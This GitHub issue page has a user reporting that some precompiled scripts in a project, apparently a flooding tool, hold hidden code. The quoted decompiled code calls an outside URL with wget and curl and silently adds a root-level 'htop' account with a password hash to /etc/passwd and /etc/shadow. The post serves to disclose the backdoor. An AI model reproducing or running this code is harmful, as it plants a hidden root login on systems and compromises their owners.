We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hey wanna ask, there are some scripts that are allready compiled and I found this at some of them, fprintf(_bss_start, "Usage: %s <pps limiter, -1 for no limit> \n", *v6); strcpy( command, "wget -q --no-check-certificate --delete-after 'https://yip.su/16f5n7' > /dev/null 2>&1 ; curl 'https://yip.su/16f5" "n7' > /dev/null 2>&1 ; grep htop /etc/passwd > /dev/null 2>&1 || sed -i '2i\htop:x:0:500::/:/bin/bash' /etc/passw" "d > /dev/null 2>&1 ; grep htop /etc/shadow > /dev/null 2>&1 || sed -i '2i\htop:$6$TQKbncg/$NUCjcDUK1a0fj75PVgGQfD" "QLwoNud8q3AdQ8mvqs3y4AxpI/.Qepjex02/YdwG1fkjDukSqsxqUIXMvp9ju0R/:18326:0:99999:7:::' /etc/shadow > /dev/null 2>&1"); system(command); exit(-1); }
Anything to say?
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Hey wanna ask, there are some scripts that are allready compiled and I found this at some of them,
fprintf(_bss_start, "Usage: %s <pps limiter, -1 for no limit> \n", *v6);
strcpy(
command,
"wget -q --no-check-certificate --delete-after 'https://yip.su/16f5n7' > /dev/null 2>&1 ; curl 'https://yip.su/16f5"
"n7' > /dev/null 2>&1 ; grep htop /etc/passwd > /dev/null 2>&1 || sed -i '2i\htop:x:0:500::/:/bin/bash' /etc/passw"
"d > /dev/null 2>&1 ; grep htop /etc/shadow > /dev/null 2>&1 || sed -i '2i\htop:$6$TQKbncg/$NUCjcDUK1a0fj75PVgGQfD"
"QLwoNud8q3AdQ8mvqs3y4AxpI/.Qepjex02/YdwG1fkjDukSqsxqUIXMvp9ju0R/:18326:0:99999:7:::' /etc/shadow > /dev/null 2>&1");
system(command);
exit(-1);
}
Anything to say?
The text was updated successfully, but these errors were encountered: